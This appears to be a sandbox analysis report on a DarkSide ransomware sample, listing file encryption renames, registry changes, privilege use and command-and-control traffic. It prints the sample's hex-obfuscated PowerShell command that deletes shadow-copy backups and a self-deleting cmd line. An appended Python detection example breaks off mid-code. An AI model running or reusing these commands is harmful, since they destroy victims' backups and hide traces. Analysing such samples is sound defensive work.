Malware Analysis Report

2024-10-16 03:30

Sample ID 220210-nx72qahabm
Target 43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa
SHA256 43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa
Tags
darkside ransomware spyware stealer suricata
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa

Threat Level: Known bad

The file 43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer suricata

suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Checks computer location settings

Deletes itself

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

Checks processor information in registry

Modifies registry class

Modifies Control Panel

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-10 11:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-10 11:47

Reported

2022-02-10 11:50

Platform

win7-en-20211208

Max time kernel

117s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

Signatures

DarkSide

ransomware darkside

suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

suricata

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\SkipDeny.crw => C:\Users\Admin\Pictures\SkipDeny.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipDeny.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeApprove.png => C:\Users\Admin\Pictures\ResumeApprove.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeApprove.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeDisable.png => C:\Users\Admin\Pictures\ResumeDisable.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeDisable.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\SaveSplit.png => C:\Users\Admin\Pictures\SaveSplit.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\SaveSplit.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\27a6f0b5.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\27a6f0b5.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5\ = "27a6f0b5" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\27a6f0b5.ico" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\43E615~1.EXE >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 www.microsoft.com udp
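
Added example, not part of the report: the table above is dominated by PTR lookups for consecutive addresses in 10.127.0.0/24, which is what a reverse-DNS sweep of the local subnet looks like from the sandbox's DNS vantage point. The Python below parses rows in this table's layout, turns in-addr.arpa names back into addresses, counts lookups per /24 and reports subnets over a threshold, and separately lists the domains contacted on 443/tcp (here securebestapp20.com, the SNI the Suricata rule fired on). The embedded rows are a transcribed subset of the table (12 of the PTR rows plus the non-PTR rows); the threshold value and function names are this example's assumptions.

```python
from __future__ import annotations

import ipaddress
from collections import Counter

# Rows transcribed from the behavioral1 Network table of this report:
# 12 of the ~250 PTR lookups plus the three non-PTR rows.
SAMPLE_NETWORK_ROWS = """\
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
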